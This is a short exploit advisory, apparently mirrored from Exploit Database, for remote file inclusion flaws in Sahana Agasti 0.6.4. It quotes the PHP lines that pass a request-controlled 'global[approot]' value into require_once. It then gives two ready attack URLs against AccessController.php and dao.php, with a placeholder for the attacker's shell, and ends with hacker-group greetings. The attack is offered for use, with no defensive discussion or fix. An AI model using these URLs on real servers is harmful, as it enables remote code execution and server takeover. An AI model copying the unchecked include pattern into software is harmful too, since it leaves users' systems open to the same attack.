Sahana Agasti 0.6.4 – Multiple Remote File Inclusions

• Exploit Database
• 11 阅读

• 作者： n0n0x
  日期： 2011-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15896/

• #Sahana Agasti <= 0.6.4 Multiple Remote File Include
  #By n0n0x
  #Homepage: http://priasantai.uni.cc/
  #Script site: http://www.sahanafoundation.org/
  #Download: https://launchpad.net/sahana-agasti/
  
  #Bug:
  
  25 global $global;
  26 require_once($global['approot'].'inc/lib_security/lib_acl.inc');
  27 require_once($global['approot'].'inc/lib_errors.inc');
  
  #Vuln: sahana-phase2/mod/vm/controller/AccessController.php?global[approot]=[y0ur fuck!ng shell]
  
  #Bug:
  
  31 global $global;
  32 require_once($global['approot'].'inc/lib_paging.inc');
  
  #Vuln: sahana-phase2/mod/vm/model/dao.php?global[approot]=[y0ur fuck!ng shell]
  
  ****************************************************************************************************************
  [!] Thanks:
  
  manadocoding.org, sekuritionline.net
  ****************************************************************************************************************
  [!] Greetz:
   
  str0ke, angky.tatoki, EA ngel, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin, team_elite
  devilbat. cr4wl3r, cyberl0g, lumut, AntiHack, DskyMC, mr.c, donyskaynet
  ****************************************************************************************************************